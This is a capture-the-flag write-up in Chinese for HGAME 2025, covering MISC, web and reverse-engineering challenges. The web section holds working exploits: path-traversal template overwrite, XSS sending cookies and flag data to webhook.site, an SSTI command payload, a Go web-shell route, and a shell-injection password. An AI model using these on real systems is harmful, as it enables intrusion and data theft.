HGAME CTF 2025 Week1 + Week2 wp

HGAME CTF

MISC

Hakuya Want A Girl Friend

def hex_to_bytes(hex_str):
    # 将十六进制字符串转化为字节序列
    hex_values = hex_str.split()  # 按空格分隔
    byte_array = bytes(int(value, 16) for value in hex_values)  # 将每个16进制字符串转换为字节
    # byte_array = bytes(int(value, 16) for value in reversed(hex_values))  # 将每个16进制字符串转换为字节
    print(byte_array)
    return byte_array

def convert_file(input_file, output_file):
    # 读取输入文件中的16进制数据
    with open(input_file, 'r') as infile:
        hex_str = infile.read().strip()  # 读取文件并去掉两端的空白符

    # 将16进制字符串转换为字节
    byte_data = hex_to_bytes(hex_str)

    # 将字节数据写入输出文件
    with open(output_file, 'wb') as outfile:
        outfile.write(byte_data)

if __name__ == "__main__":
    input_filename = "hky.txt"  # 输入文件路径
    output_filename = "output.bin"  # 输出文件路径
    convert_file(input_filename, output_filename)

正着是个zip

倒过来是个png

改png：

To_f1nd_th3_QQ

hagme{h4kyu4_w4nt_gir1f3nd_+q_931290928}

我用winrar压不出来，只能用360压缩，还有这里的ag倒了

Level 314 线性走廊中的双生实体

pt文件本质上也是压缩包，打开可以看到源码：

class MyModel(Module):
  __parameters__ = []
  __buffers__ = []
  training : bool
  _is_full_backward_hook : Optional[bool]
  linear1 : __torch__.torch.nn.modules.linear.Linear
  security : __torch__.SecurityLayer
  relu : __torch__.torch.nn.modules.activation.ReLU
  linear2 : __torch__.torch.nn.modules.linear.___torch_mangle_0.Linear
  def forward(self: __torch__.MyModel,
    x: Tensor) -> Tensor:
    linear1 = self.linear1
    x0 = (linear1).forward(x, )
    security = self.security
    x1 = (security).forward(x0, )
    relu = self.relu
    x2 = (relu).forward(x1, )
    linear2 = self.linear2
    return (linear2).forward(x2, )
class SecurityLayer(Module):
  __parameters__ = []
  __buffers__ = []
  training : bool
  _is_full_backward_hook : Optional[bool]
  flag : List[int]
  fake_flag : List[int]
  def forward(self: __torch__.SecurityLayer,
    x: Tensor) -> Tensor:
    _0 = torch.allclose(torch.mean(x), torch.tensor(0.31415000000000004), 1.0000000000000001e-05, 0.0001)
    if _0:
      _1 = annotate(List[str], [])
      flag = self.flag
      for _2 in range(torch.len(flag)):
        b = flag[_2]
        _3 = torch.append(_1, torch.chr(torch.__xor__(b, 85)))
      decoded = torch.join("", _1)
      print("Hidden:", decoded)
    else:
      pass
    if bool(torch.gt(torch.mean(x), 0.5)):
      _4 = annotate(List[str], [])
      fake_flag = self.fake_flag
      for _5 in range(torch.len(fake_flag)):
        c = fake_flag[_5]
        _6 = torch.append(_4, torch.chr(torch.sub(c, 3)))
      decoded0 = torch.join("", _4)
      print("Decoy:", decoded0)
    else:
      pass
    return x

直接访问security：

import torch

model = torch.jit.load("entity.pt")
for i in model.security.flag:
    print(chr(i ^ 85),end='')

flag{s0_th1s_1s_r3al_s3cr3t}

Computer cleaner

hgame{y0u_

看日志

_c0mput3r!}

日志中的IP访问即可

hgame{y0u_hav3_cleaned_th3_c0mput3r!}

Computer cleaner plus

hgame{B4ck_D0_oR}

Level 729 易画行

根据给的网站和16进制慢慢找即可

WEB

Level 24 Pacman

游戏玩玩发现gift

分别Base64解出来不成样子，猜测栅栏加密过了，因为里面含有hagme，pacman等信息

Level 47 BandBomb

deepseek一把梭

import requests
import time

TARGET = "http://node1.hgame.vidar.club:31545"

# 1. 上传恶意模板文件
malicious_file = {
    "file": ("exploit.ejs", "<%= process.env.FLAG || fs.readFileSync('/flag') %>")
}

print("[*] 上传恶意模板...")
upload_res = requests.post(f"{TARGET}/upload", files=malicious_file)
if upload_res.json().get("message") != "文件上传成功":
    print("[-] 上传失败:", upload_res.text)
    exit()

print("[+] 上传成功，文件名:", upload_res.json()["filename"])

# 2. 重命名为模板路径（路径穿越）
print("[*] 执行路径穿越重命名...")
rename_data = {
    "oldName": "exploit.ejs",
    "newName": "../views/mortis.ejs"  # 覆盖模板文件
}
rename_res = requests.post(f"{TARGET}/rename", json=rename_data)
if rename_res.status_code != 200:
    print("[-] 重命名失败:", rename_res.text)
    exit()

print("[+] 模板覆盖成功")

# 3. 触发模板渲染获取flag
print("[*] 触发模板渲染...")
time.sleep(1)  # 等待服务器加载新模板
flag_res = requests.get(TARGET)

# 提取flag（根据实际响应结构调整）
if "hgame{" in flag_res.text:
    start = flag_res.text.index("hgame{")
    end = flag_res.text.index("}", start) + 1
    flag = flag_res.text[start:end]
    print(f"[+] Flag获取成功: {flag}")
else:
    print("[!] 在响应中未找到flag，请手动检查:")
    print(flag_res.text)

Level 69 MysteryMessageBoard

func main() {
	r := gin.Default()
	r.GET("/login", loginHandler)
	r.POST("/login", loginHandler)
	r.GET("/logout", logoutHandler)
	r.GET("/", indexHandler)
	r.GET("/admin", adminHandler)
	r.GET("/flag", flagHandler)
	log.Println("Server started at :8888")
	log.Fatal(r.Run(":8888"))
}

不能直接访问flag

爆破

<script>location.href="https://webhook.site/5xxx420-4def-9884-50771b3e7b1b/"+document.cookie</script>
<script>location.href="http://17x3/"+document.cookie</script>

https://webhook.site/541f57b2-1420-4def-9884-50771b3e7b1b/session=MTc0MDIyOTgzMHxEWDhFQVFMX2dBQUJFQUVRQUFBcF80QUFBUVp6ZEhKcGJtY01DZ0FJZFhObGNtNWhiV1VHYzNSeWFXNW5EQWtBQjNOb1lXeHNiM1E9fIijZBwSkcJs7ZWmGcolxQ8y5b8w2-erUTzZIGX02dxk

但不知道为什么访问不了

最后写了脚本：

import requests

# 配置参数
target_url = "http://node1.hgame.vidar.club:30143"
webhook_url = "https://webhook.site/541f57b2xxx0-4def-9884-50771b3e7b1b"  # 替换为你的Webhook URL

# 步骤1：登录普通用户获取session
login_url = f"{target_url}/login"
login_data = {
    "username": "shallot",
    "password": "888888"
}
response = requests.post(login_url, data=login_data)
session_cookie = response.cookies.get("session")

# 检查是否登录成功
if not session_cookie:
    print("登录失败，请检查凭证或服务状态。")
    exit()

# 步骤2：提交XSS评论
comment_url = f"{target_url}/"
comment_payload = f'<script>fetch("/flag").then(r => r.text()).then(d => fetch("{webhook_url}?flag=" + encodeURIComponent(d)))</script>'
comment_data = {
    "comment": comment_payload
}
cookies = {
    "session": session_cookie
}
# 需要允许重定向，确保POST请求成功
response = requests.post(comment_url, data=comment_data, cookies=cookies, allow_redirects=True)

if response.status_code != 200:
    print("提交评论失败，状态码：", response.status_code)
    exit()

# 步骤3：触发管理员访问评论页面
admin_url = f"{target_url}/admin"
response = requests.get(admin_url, cookies=cookies)

print("攻击完成，请检查Webhook接收的flag。")

成功了

hgame{W0w_y0u_5r4_9o0d_4t_xss}

Level 38475 角落

dirsearch

app.conf:

# Include by httpd.conf
<Directory "/usr/local/apache2/app">
	Options Indexes
	AllowOverride None
	Require all granted
</Directory>

<Files "/usr/local/apache2/app/app.py">
    Order Allow,Deny
    Deny from all
</Files>

RewriteEngine On
RewriteCond "%{HTTP_USER_AGENT}" "^L1nk/"
RewriteRule "^/admin/(.*)$" "/$1.html?secret=todo"

ProxyPass "/app/" "http://127.0.0.1:5000/"

这里要利用RewriteRule和RewriteCond

RewriteEngine On
RewriteCond "%{HTTP_USER_AGENT}" "^L1nk/"   # 条件：User-Agent 以 "L1nk/" 开头
RewriteRule "^/admin/(.*)$" "/$1.html?secret=todo"  # 将 /admin/xxx 重写为 /xxx.html?secret=todo

1. 当用户访问 /admin/flag 时，若其 User-Agent 满足 ^L1nk/（以 “L1nk/“ 开头），则触发重写。
2. 最终请求会被转换为 /flag.html?secret=todo，服务器返回此路径的内容。

因此可以

http://node1.hgame.vidar.club:30383/admin/usr/local/apache2/app/app.py%3f
User-Agent L1nk/

访问/usr/local/apache2/app/app.py

不能直接/admin/usr/local/apache2/app/app.py，apache 的配置中明确禁止访问 /usr/local/apache2/app/app.py

即使伪造了 User-Agent，重写规则会将请求转换为：

/usr/local/apache2/app/app.py?.html?secret=todo

此时会把?.html?secret=todo当成参数

如下

from flask import Flask, request, render_template, render_template_string, redirect
import os
import templates

app = Flask(__name__)
pwd = os.path.dirname(__file__)
show_msg = templates.show_msg


def readmsg():
	filename = pwd + "/tmp/message.txt"
	if os.path.exists(filename):
		f = open(filename, 'r')
		message = f.read()
		f.close()
		return message
	else:
		return 'No message now.'


@app.route('/index', methods=['GET'])
def index():
	status = request.args.get('status')
	if status is None:
		status = ''
	return render_template("index.html", status=status)


@app.route('/send', methods=['POST'])
def write_message():
	filename = pwd + "/tmp/message.txt"
	message = request.form['message']

	f = open(filename, 'w')
	f.write(message) 
	f.close()

	return redirect('index?status=Send successfully!!')
	
@app.route('/read', methods=['GET'])
def read_message():
	if "{" not in readmsg():
		show = show_msg.replace("{{message}}", readmsg())
		return render_template_string(show)
	return 'waf!!'
	

if __name__ == '__main__':
	app.run(host = '0.0.0.0', port = 5000)

send：%7B%7B7*7%7D%7D

都不行

后来用了条件竞争

import requests
import threading

TARGET = "http://node1.hgame.vidar.club:30383/app/"
PAYLOAD = "{{config.__class__.__init__.__globals__['os'].popen('cat /flag').read()}}"  # 或读取文件的 Payload

def send_payload():
    # 清空旧消息，确保检查通过
    requests.post(TARGET + "send", data={"message": "clean"})
    # 快速写入恶意 Payload
    while True:
        requests.post(TARGET + "send", data={"message": PAYLOAD})

def read_flag():
    while True:
        r = requests.get(TARGET + "read")
        if "hgame" in r.text:
            print("[+] Flag found:", r.text)
            exit()

# 启动 20 个写入线程和 20 个读取线程
for _ in range(20):
    threading.Thread(target=send_payload).start()
    threading.Thread(target=read_flag).start()

给了一个main，upx脱壳

发现：

access_key：minio_admin
secret_key：JPSQ4NOBvh2/W7hzdLyRYLDm0wNRMG48BL09yOKGpHs=

Minio Client

下载：https://dl.min.io/client/mc/release/

使用：https://www.cnblogs.com/panw/p/16801534.html

添加云储存服务：

/mc config host add minio http://node1.hgame.vidar.club:30133 minio_admin JPSQ4NOBvh2/W7hzdLyRYLDm0wNRMG48BL09yOKGpHs= --api s3v4

查看储存内容：

./mc ls minio
[2025-01-17 22:11:05 CST]     0B hints/
[2025-01-17 22:11:09 CST]     0B prodbucket/

发现有hints文件夹，进去看看：

./mc ls minio/hints
[2025-01-17 22:11:05 CST] 8.2KiB STANDARD src.zip

是源码，把它下载下来：

./mc cp minio/hints/src.zip ./src.zip
...314/hints/src.zip: 8.24 KiB / 8.24 KiB [============================================================] 11.75 KiB/s 0s

源码：

package main

import (
	"level25/fetch"

	"level25/conf"

	"github.com/gin-gonic/gin"
	"github.com/jpillora/overseer"
)

func main() {
	fetcher := &fetch.MinioFetcher{
		Bucket:    conf.MinioBucket,
		Key:       conf.MinioKey,
		Endpoint:  conf.MinioEndpoint,
		AccessKey: conf.MinioAccessKey,
		SecretKey: conf.MinioSecretKey,
	}
	overseer.Run(overseer.Config{
		Program: program,
		Fetcher: fetcher,
	})

}

func program(state overseer.State) {
	g := gin.Default()
	g.StaticFS("/", gin.Dir(".", true))
	g.Run(":8080")
}

引用了overseer，说明程序是热加载的，文件变更会自动重启。重写一个main.go，加一个命令执行路由，update上去，就可以rce了。

package main
 
import (
	"fmt"
	"level25/fetch"
	"os/exec"
 
	"level25/conf"
 
	"github.com/gin-gonic/gin"
	"github.com/jpillora/overseer"
)
 
func main() {
	fetcher := &fetch.MinioFetcher{
		Bucket:    conf.MinioBucket,
		Key:       conf.MinioKey,
		Endpoint:  conf.MinioEndpoint,
		AccessKey: conf.MinioAccessKey,
		SecretKey: conf.MinioSecretKey,
	}
	overseer.Run(overseer.Config{
		Program: program,
		Fetcher: fetcher,
	})
 
}
 
func program(state overseer.State) {
	g := gin.Default()
	g.GET("/test", func(c *gin.Context) {
		c.String(200, "good")
	})
	g.GET("/shell", func(c *gin.Context) {
		// 获取URL中的command参数
		command := c.DefaultQuery("cmd", "")
		if command != "" {
			// 执行命令
			out, err := exec.Command("sh", "-c", command).Output()
			if err != nil {
				c.String(500, fmt.Sprintf("Error executing command: %v", err))
			} else {
				c.String(200, fmt.Sprintf("Command Output:\n%s", out))
			}
		} else {
			c.String(400, "No command provided")
		}
	})
 
	g.Run(":8080")
}

go build -o update
mc cp ./update minio/prodbucket/update

Level 21096 HoneyPot

漏洞点：

导入数据部分有个命令执行

func ImportData(c *gin.Context) {
	var config ImportConfig
	if err := c.ShouldBindJSON(&config); err != nil {
		c.JSON(http.StatusBadRequest, gin.H{
			"success": false,
			"message": "Invalid request body: " + err.Error(),
		})
		return
	}
	if err := validateImportConfig(config); err != nil {
		c.JSON(http.StatusBadRequest, gin.H{
			"success": false,
			"message": "Invalid input: " + err.Error(),
		})
		return
	}

	config.RemoteHost = sanitizeInput(config.RemoteHost)
	config.RemoteUsername = sanitizeInput(config.RemoteUsername)
	config.RemoteDatabase = sanitizeInput(config.RemoteDatabase)
	config.LocalDatabase = sanitizeInput(config.LocalDatabase)
	if manager.db == nil {
		dsn := buildDSN(localConfig)
		db, err := sql.Open("mysql", dsn)
		if err != nil {
			c.JSON(http.StatusInternalServerError, gin.H{
				"success": false,
				"message": "Failed to connect to local database: " + err.Error(),
			})
			return
		}

		if err := db.Ping(); err != nil {
			db.Close()
			c.JSON(http.StatusInternalServerError, gin.H{
				"success": false,
				"message": "Failed to ping local database: " + err.Error(),
			})
			return
		}

		manager.db = db
	}
	if err := createdb(config.LocalDatabase); err != nil {
		c.JSON(http.StatusInternalServerError, gin.H{
			"success": false,
			"message": "Failed to create local database: " + err.Error(),
		})
		return
	}
	//Never able to inject shell commands,Hackers can't use this,HaHa
	command := fmt.Sprintf("/usr/local/bin/mysqldump -h %s -u %s -p%s %s |/usr/local/bin/mysql -h 127.0.0.1 -u %s -p%s %s",
		config.RemoteHost,
		config.RemoteUsername,
		config.RemotePassword,
		config.RemoteDatabase,
		localConfig.Username,
		localConfig.Password,
		config.LocalDatabase,
	)
	fmt.Println(command)
	cmd := exec.Command("sh", "-c", command)
	if err := cmd.Run(); err != nil {
		c.JSON(http.StatusInternalServerError, gin.H{
			"success": false,
			"message": "Failed to import data: " + err.Error(),
		})
		return
	}

	c.JSON(http.StatusOK, gin.H{
		"success": true,
		"message": "Data imported successfully",
	})
}

func validateImportConfig(config ImportConfig) error {
	if config.RemoteHost == "" ||
		config.RemoteUsername == "" ||
		config.RemoteDatabase == "" ||
		config.LocalDatabase == "" {
		return fmt.Errorf("missing required fields")
	}

	if match, _ := regexp.MatchString(`^[a-zA-Z0-9\.\-]+$`, config.RemoteHost); !match {
		return fmt.Errorf("invalid remote host")
	}

	if match, _ := regexp.MatchString(`^[a-zA-Z0-9_]+$`, config.RemoteUsername); !match {
		return fmt.Errorf("invalid remote username")
	}

	if match, _ := regexp.MatchString(`^[a-zA-Z0-9_]+$`, config.RemoteDatabase); !match {
		return fmt.Errorf("invalid remote database name")
	}

	if match, _ := regexp.MatchString(`^[a-zA-Z0-9_]+$`, config.LocalDatabase); !match {
		return fmt.Errorf("invalid local database name")
	}

	return nil
}

填入密码时：root; /writeflag即可

然后访问/flag即可

RE

Compress dot new

Compress.nu中有Nushell代码

def "into b" [] {
let arg = $in;
	0..(( $arg|length ) - 1) | each {|i| $arg | bytes at $i..$i | into int }
}

这个函数的作用是将输入转换为字节数组的整数形式。例如，如果输入是二进制数据，每个字节会被转换为0-255的整数，并生成一个列表。比如字符串”abc”会被转换为[97,98,99]。

接下来是gss和gw这两个函数，gss函数匹配输入的结构，如果是{s:s, w:w}则返回[s]，如果是{a:a, b:b, ss:ss, w:w}则返回ss。gw函数则是提取w字段。这可能是在构建哈夫曼树的过程中使用的，因为哈夫曼树的节点通常会有权重（w），而内部节点有左右子树，叶子节点有符号和权重。

接下来是oi函数，这是一个插入排序或者维护优先队列的函数？参数是v，输入是一个列表。如果列表为空，返回[v]；否则，如果当前元素的权重小于头部的权重，就插入到前面，否则递归处理尾部。这可能用于维护一个优先队列，按权重从小到大排序，用于构建哈夫曼树。

h函数看起来是构建哈夫曼树的函数。它处理输入的列表，如果是空则返回空，如果只有一个节点则返回该节点，否则取出前两个节点（假设输入是按权重排序的），合并成一个内部节点，权重是两者的和，然后递归处理。这符合哈夫曼树的构建过程：每次取出两个最小的权重节点，合并成一个新节点，然后重新插入队列，直到只剩一个节点。

gc函数可能用于生成哈夫曼编码表。它定义了一个内部函数t，递归遍历哈夫曼树，并为每个叶子节点生成对应的二进制编码（0和1的字符串）。例如，左子树路径添加0，右子树添加1。最终返回每个符号s对应的编码cs。

sk函数可能是将哈夫曼树的结构序列化为JSON，以便在解压时重建哈夫曼树。

bf函数的作用是统计输入字节的频率。它先将输入转换为字节数组，然后统计每个字节出现的次数，返回一个包含{s: 字节值, w: 出现次数}的列表。这明显是哈夫曼编码前的频率统计步骤。

enc函数接受编码表cd，将输入转换为对应的二进制字符串。对于每个字节b，查找编码表中对应的cs，然后拼接所有二进制字符串，得到压缩后的比特流。

compress函数则是整个压缩流程：首先调用bf统计频率，然后构建哈夫曼树h，接着生成编码表gc，然后将输入数据用enc函数编码，并将树的结构和编码后的字符串拼接保存。

enc.txt：

enc.txt的内容分为两部分，第一部分是JSON结构，第二部分是二进制字符串。根据compress函数中的代码，输出的第一部分是($t | sk | to json –raw)，也就是哈夫曼树的简化结构，第二部分是编码后的二进制字符串。所以enc.txt中的JSON部分对应哈夫曼树的结构，后面的长二进制字符串是压缩后的数据。

sk函数：当处理节点时，如果是叶子节点，就保留s属性；如果是内部节点，则递归处理a和b。(缺少权重信息)

如，JSON结构中的某个路径是a.a.a.a.a对应符号125，编码可能是00000。

分析

1. 解析哈夫曼树结构

   enc.txt中的JSON部分描述了哈夫曼树的节点结构。每个内部节点包含a和b子节点，叶子节点包含s（符号）字段。遍历该结构，生成每个符号对应的哈夫曼编码。

2. 构建哈夫曼编码表：递归遍历JSON树，记录每个符号的路径（a对应0，b对应1），生成符号到二进制编码的映射。

3. 解码二进制字符串：使用编码表将enc.txt中的二进制字符串逐位匹配，转换为原始字节数据，最终得到flag。

import json

def build_huffman_codes(node, current_code, codes):
    if 's' in node:
        codes[node['s']] = current_code
        return
    if 'a' in node:
        build_huffman_codes(node['a'], current_code + '0', codes)
    if 'b' in node:
        build_huffman_codes(node['b'], current_code + '1', codes)

# 读取enc.txt并分离JSON和二进制部分
with open('enc.txt', 'r') as f:
    content = f.read().split('\n', 1)
    json_part = content[0]
    binary_str = content[1].strip()

# 解析JSON结构
json_data = json.loads(json_part)

# 构建哈夫曼编码表
huffman_codes = {}
build_huffman_codes(json_data['a'], '0', huffman_codes)
build_huffman_codes(json_data['b'], '1', huffman_codes)

# 创建解码映射（编码到符号）
reverse_codes = {v: k for k, v in huffman_codes.items()}

# 解码二进制字符串
decoded = []
current_code = ''
for bit in binary_str:
    current_code += bit
    if current_code in reverse_codes:
        symbol = reverse_codes[current_code]
        decoded.append(int(symbol))
        current_code = ''

# 转换解码后的符号为ASCII字符串
flag_bytes = bytes(decoded)
print("Flag:", flag_bytes.decode('ascii'))

中间输出这些中间变量就能懂了

Turtle

看来得手动脱壳

看别人的wp发现了XVolkolak 0.22 静态脱壳神器汉化版 - 吾爱破解 - 52pojie.cn

这个工具，可以直接脱

F9到这再F8一下发现RSP变化

右键RSP跟随，下面面板下硬件断点

int __fastcall main(int argc, const char **argv, const char **envp)
{
  char v4[256]; // [rsp+20h] [rbp-60h] BYREF
  char v5[48]; // [rsp+120h] [rbp+A0h] BYREF
  char v6[46]; // [rsp+150h] [rbp+D0h] BYREF
  char v7[5]; // [rsp+17Eh] [rbp+FEh] BYREF
  char v8[2]; // [rsp+183h] [rbp+103h] BYREF
  char v9[8]; // [rsp+185h] [rbp+105h] BYREF
  char v10[8]; // [rsp+18Dh] [rbp+10Dh] BYREF
  char v11[11]; // [rsp+195h] [rbp+115h] BYREF
  unsigned int v12; // [rsp+1A0h] [rbp+120h]
  int v13; // [rsp+1A4h] [rbp+124h]
  int v14; // [rsp+1A8h] [rbp+128h]
  unsigned int v15; // [rsp+1ACh] [rbp+12Ch]

  sub_401C20(argc, argv, envp);
  strcpy(v11, "yekyek");
  v7[0] = -51;
  v7[1] = -113;
  v7[2] = 37;
  v7[3] = 61;
  v7[4] = -31;
  qmemcpy(v8, "QJ", sizeof(v8));
  v5[0] = -8;
  v5[1] = -43;
  v5[2] = 98;
  v5[3] = -49;
  v5[4] = 67;
  v5[5] = -70;
  v5[6] = -62;
  v5[7] = 35;
  v5[8] = 21;
  v5[9] = 74;
  v5[10] = 81;
  v5[11] = 16;
  v5[12] = 39;
  v5[13] = 16;
  v5[14] = -79;
  v5[15] = -49;
  v5[16] = -60;
  v5[17] = 9;
  v5[18] = -2;
  v5[19] = -29;
  v5[20] = -97;
  v5[21] = 73;
  v5[22] = -121;
  v5[23] = -22;
  v5[24] = 89;
  v5[25] = -62;
  v5[26] = 7;
  v5[27] = 59;
  v5[28] = -87;
  v5[29] = 17;
  v5[30] = -63;
  v5[31] = -68;
  v5[32] = -3;
  v5[33] = 75;
  v5[34] = 87;
  v5[35] = -60;
  v5[36] = 126;
  v5[37] = -48;
  v5[38] = -86;
  v5[39] = 10;
  v15 = 6;
  v14 = 7;
  v13 = 40;
  sub_403068(aPlzInputTheKey);
  sub_403058("%s", v9);
  sub_403048(v10, v9);
  v12 = 7;
  sub_401550(v11, v15, v4);
  sub_40163E(v9, v12, v4);
  if ( (unsigned int)sub_403078(v9, v7, v14) ) {
    sub_403060(aKeyIsWrong);
  }
  else {
    sub_403068(aPlzInputTheFla);
    sub_403058("%s", v6);
    *(_DWORD *)&v11[7] = 40;
    sub_401550(v10, v12, v4);
    sub_40175A(v6, *(unsigned int *)&v11[7], v4);
    if ( (unsigned int)sub_403078(v6, v5, v13) )
      sub_403060(aWrongPlzTryAga);
    else
      sub_403060(aCongratulate);
  }
  return 0;
}

里面一些函数无法跟进，我不知道是不是脱壳脱得地方不在jmp的问题，可以试试看，不过也可以猜出来那些函数的作用

看着像rc4,v12是7，v8没用到过，可以猜他俩是一起的

加密

key

1. 解析密钥加密过程
   • 使用密钥"yekyek"初始化RC4的S盒，生成密钥流。
   • 将预设的密文与密钥流异或，得到原始密钥。
2. 解密Flag
   • 使用上一步得到的正确密钥再次初始化RC4的S盒，生成40字节密钥流。
   • 对v5数组中的密文逐字节加上密钥流的值（模256），得到原始flag。

再说详细点，看代码

sub_401550(v11, v15, v4);
sub_40163E(v9, v12, v4);

v11生成v4，v4和我们输入的v9配合异或生成新的v4然后再到下面去

sub_403058("%s", v6);
*(_DWORD *)&v11[7] = 40;
sub_401550(v10, v12, v4);
sub_40175A(v6, *(unsigned int *)&v11[7], v4);

生成新的s盒v4密钥流，再去做减法操作(sub_40175A和sub_40163E只是从异或变成减法的区别)

因为要逆向，所以写代码时用加法

def ksa(key):
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    return s

def prga(s, length):
    i = j = 0
    keystream = []
    for _ in range(length):
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        k = s[(s[i] + s[j]) % 256]
        keystream.append(k)
    return keystream

# 解密密钥部分
key = b"yekyek"
s_yekyek = ksa(key)
keystream_yekyek = prga(s_yekyek, 7)

cipher_key = bytes([0xCD, 0x8F, 0x25, 0x3D, 0xE1, 0x51, 0x4A])
plain_key = bytes([c ^ k for c, k in zip(cipher_key, keystream_yekyek)])
print(f"解密得到的密钥: {plain_key}")

# 使用密钥解密flag
s_flag = ksa(plain_key)
keystream_flag = prga(s_flag, 40)

# enc
v5_cipher = [
    0xF8, 0xD5, 0x62, 0xCF, 0x43, 0xBA, 0xC2, 0x23, 0x15, 0x4A,
    0x51, 0x10, 0x27, 0x10, 0xB1, 0xCF, 0xC4, 0x09, 0xFE, 0xE3,
    0x9F, 0x49, 0x87, 0xEA, 0x59, 0xC2, 0x07, 0x3B, 0xA9, 0x11,
    0xC1, 0xBC, 0xFD, 0x4B, 0x57, 0xC4, 0x7E, 0xD0, 0xAA, 0x0A
]

# 解密：c + k mod 256
flag_bytes = bytes([(c + k) % 256 for c, k in zip(v5_cipher, keystream_flag)])

print("flag:", flag_bytes.decode('ascii'))

就是两次rc4

Delta Erro0000ors [复现]

int __fastcall main(int argc, const char **argv, const char **envp)
{
  HMODULE LibraryA; // rax
  DWORD LastError; // eax
  __int128 v6; // [rsp+20h] [rbp-138h]
  __int64 v7; // [rsp+30h] [rbp-128h]
  __int128 v8; // [rsp+38h] [rbp-120h]
  __int64 v9; // [rsp+48h] [rbp-110h]
  __int128 v10; // [rsp+50h] [rbp-108h] BYREF
  __int64 v11; // [rsp+60h] [rbp-F8h]
  __int128 v12; // [rsp+70h] [rbp-E8h] BYREF
  __int64 v13; // [rsp+80h] [rbp-D8h]
  char Destination[16]; // [rsp+90h] [rbp-C8h] BYREF
  __int128 v15; // [rsp+A0h] [rbp-B8h]
  int v16; // [rsp+B0h] [rbp-A8h]
  char v17; // [rsp+B4h] [rbp-A4h]
  char Buffer[16]; // [rsp+B8h] [rbp-A0h]
  __int128 v19; // [rsp+C8h] [rbp-90h]
  __int64 v20; // [rsp+D8h] [rbp-80h]
  char Str1[16]; // [rsp+E0h] [rbp-78h] BYREF
  __int128 v22; // [rsp+F0h] [rbp-68h]
  __int128 v23; // [rsp+100h] [rbp-58h]
  __int128 v24; // [rsp+110h] [rbp-48h]
  __int128 v25; // [rsp+120h] [rbp-38h]
  __int128 v26; // [rsp+130h] [rbp-28h]
  int v27; // [rsp+140h] [rbp-18h]

  LibraryA = LoadLibraryA("msdelta.dll");
  hLibModule = LibraryA;
  if ( LibraryA )
  {
    qword_140005180 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD))GetProcAddress(LibraryA, "ApplyDeltaB");
    DeltaFree = (BOOL (__stdcall *)(LPVOID))GetProcAddress(hLibModule, "DeltaFree");
  }
  else
  {
    puts("LoadLibrary Error");
  }
  *(_OWORD *)Str1 = 0i64;
  v22 = 0i64;
  v23 = 0i64;
  v24 = 0i64;
  v25 = 0i64;
  v26 = 0i64;
  v27 = 0;
  *(_OWORD *)Destination = 0i64;
  v15 = 0i64;
  v16 = 0;
  v17 = 0;
  *(_OWORD *)Buffer = 0i64;
  v19 = 0i64;
  v20 = 0i64;
  sub_140001020("input your flag:");
  sub_140001080("%43s");
  if ( !strncmp(Str1, "hgame{", 6ui64) && BYTE10(v23) == '}' )
  {
    strncpy(Destination, &Str1[6], 0x24ui64);
    LODWORD(v9) = 0;
    *(_QWORD *)&v8 = Destination;
    *((_QWORD *)&v8 + 1) = 37i64;
    LODWORD(v7) = 0;
    *(_QWORD *)&v6 = &unk_1400050A0;
    *((_QWORD *)&v6 + 1) = 69i64;
    v10 = v6;
    v11 = v7;
    v12 = v8;
    v13 = v9;
    if ( qword_140005180(0i64, &v12, &v10, &qword_140005190) )
    {
      sub_140001020("%s");
    }
    else
    {
      puts("ApplyDelta Error");
      LastError = GetLastError();
      RaiseException(LastError, 1u, 0, 0i64);
    }
  }
  puts(aGreat);
  ((void (__fastcall *)(__int64))DeltaFree)(qword_140005190);
  FreeLibrary(hLibModule);
  return 0;
}

E…一开始找半天也不知道怎么跑

后来看了下汇编代码

这里有一块Seven..并没有被反编译没可能哪里出错了

跳到这，

直接把那块nop掉

int __fastcall main(int argc, const char **argv, const char **envp)
{
  HMODULE LibraryA; // rax
  DWORD LastError; // eax
  char *v5; // rbx
  char *v6; // rdi
  __int64 v7; // rsi
  int v8; // ecx
  __int64 v9; // r8
  __int128 v11; // [rsp+20h] [rbp-138h]
  __int64 v12; // [rsp+30h] [rbp-128h]
  __int128 v13; // [rsp+38h] [rbp-120h]
  __int64 v14; // [rsp+48h] [rbp-110h]
  __int128 v15; // [rsp+50h] [rbp-108h] BYREF
  __int64 v16; // [rsp+60h] [rbp-F8h]
  __int128 v17; // [rsp+70h] [rbp-E8h] BYREF
  __int64 v18; // [rsp+80h] [rbp-D8h]
  char Destination[16]; // [rsp+90h] [rbp-C8h] BYREF
  __int128 v20; // [rsp+A0h] [rbp-B8h]
  int v21; // [rsp+B0h] [rbp-A8h]
  char v22; // [rsp+B4h] [rbp-A4h]
  char Buffer[16]; // [rsp+B8h] [rbp-A0h] BYREF
  __int128 v24; // [rsp+C8h] [rbp-90h]
  __int64 v25; // [rsp+D8h] [rbp-80h]
  char Str1[16]; // [rsp+E0h] [rbp-78h] BYREF
  __int128 v27; // [rsp+F0h] [rbp-68h]
  __int128 v28; // [rsp+100h] [rbp-58h]
  __int128 v29; // [rsp+110h] [rbp-48h]
  __int128 v30; // [rsp+120h] [rbp-38h]
  __int128 v31; // [rsp+130h] [rbp-28h]
  int v32; // [rsp+140h] [rbp-18h]

  LibraryA = LoadLibraryA("msdelta.dll");
  hLibModule = LibraryA;
  if ( LibraryA )
  {
    qword_140005180 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD))GetProcAddress(LibraryA, "ApplyDeltaB");
    DeltaFree = (BOOL (__stdcall *)(LPVOID))GetProcAddress(hLibModule, "DeltaFree");
  }
  else
  {
    puts("LoadLibrary Error");
  }
  *(_OWORD *)Str1 = 0i64;
  v27 = 0i64;
  v28 = 0i64;
  v29 = 0i64;
  v30 = 0i64;
  v31 = 0i64;
  v32 = 0;
  *(_OWORD *)Destination = 0i64;
  v20 = 0i64;
  v21 = 0;
  v22 = 0;
  *(_OWORD *)Buffer = 0i64;
  v24 = 0i64;
  v25 = 0i64;
  sub_140001020("input your flag:");
  sub_140001080("%43s");
  if ( !strncmp(Str1, "hgame{", 6ui64) && BYTE10(v28) == 125 )
  {
    strncpy(Destination, &Str1[6], 0x24ui64);
    LODWORD(v14) = 0;
    *(_QWORD *)&v13 = Destination;
    *((_QWORD *)&v13 + 1) = 37i64;
    LODWORD(v12) = 0;
    *(_QWORD *)&v11 = &unk_1400050A0;
